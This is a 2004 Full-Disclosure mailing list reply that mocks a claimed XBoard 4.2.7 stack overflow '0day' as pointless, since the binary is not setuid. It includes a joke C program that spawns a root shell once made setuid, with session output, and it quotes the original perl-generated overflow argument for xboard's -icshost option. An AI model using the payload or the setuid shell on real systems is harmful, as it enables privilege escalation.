Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerability!
From: d4rk (d4rk_at_securitylab.ru)
Date: 03/02/04
- Previous message: Steve Menard: "Re: [Full-Disclosure] Need help in performing a remote vulnerability scan"
- In reply to: narko tix: "[Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerability!"
- Next in thread: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerability!"
- Reply: Valdis.Kletnieks_at_vt.edu: "Re: [Full-Disclosure] Smashing "XBoard 4.2.7(All versions)" For Fun & Profit.*Unpublished Local Stack Overflow Vulnerability!"
To: full-disclosure@lists.netsys.com
Date: Tue, 2 Mar 2004 12:01:08 +0300
> /**
> ** ! XBoard 4.2.7 UNPUBLISHED VULNERABLITY , 0hDAY !
> *
Oh yeah, xplo for non-suid prog is real oday.
I can show u one universal exploit code for ALL linux/x86 boxes! And u will
not need to exploit bofs in non-suid binaries in future!
This is real 0day! Do-not-distribute!#@&(*)$#@
Are u ready??!
Here it is:
====zer0-day====
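#include <unistd.h>

int main() {
    /* succeeds only if the process already has root privilege (e.g. a setuid-root binary) */
    setreuid(0, 0);
    execl("/bin/sh", "sh", (char *)NULL);
    return 1; /* reached only if execl() fails */
}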
=====end======
Let's check!
# gcc -o zer0-day linux-own.c
# su nobody
sh: /root/.bashrc: Permission denied
sh-2.05b$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
/* here we are waiting when somebody with root-access will make it suid. */
/* or if root is your friend, u can ask him to do it. */
/* or if root == you, just su (chown root.root if needed) and chmod +s */
/* or somehow it will be suid by default? but i dont think so.. */
/* anyway... */
sh-2.05b$ ./zer0-day
sh-2.05b# id
uid=0(root) gid=65534(nogroup) groups=65534(nogroup)
sh-2.05b#
Yea! We did it!!
>narkotix@labs:~/c-hell$ /usr/X11R6/bin/xboard -ics -icshost `perl -e 'print
>"\x7e\xfd\xff\xbf"x166'`
>sh-2.05b# id
>uid=0(root) gid=100(users) groups=100(users) <-----on my box all of
>the programs r SUID :P just demonstrated.
As u c, on my box too =)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html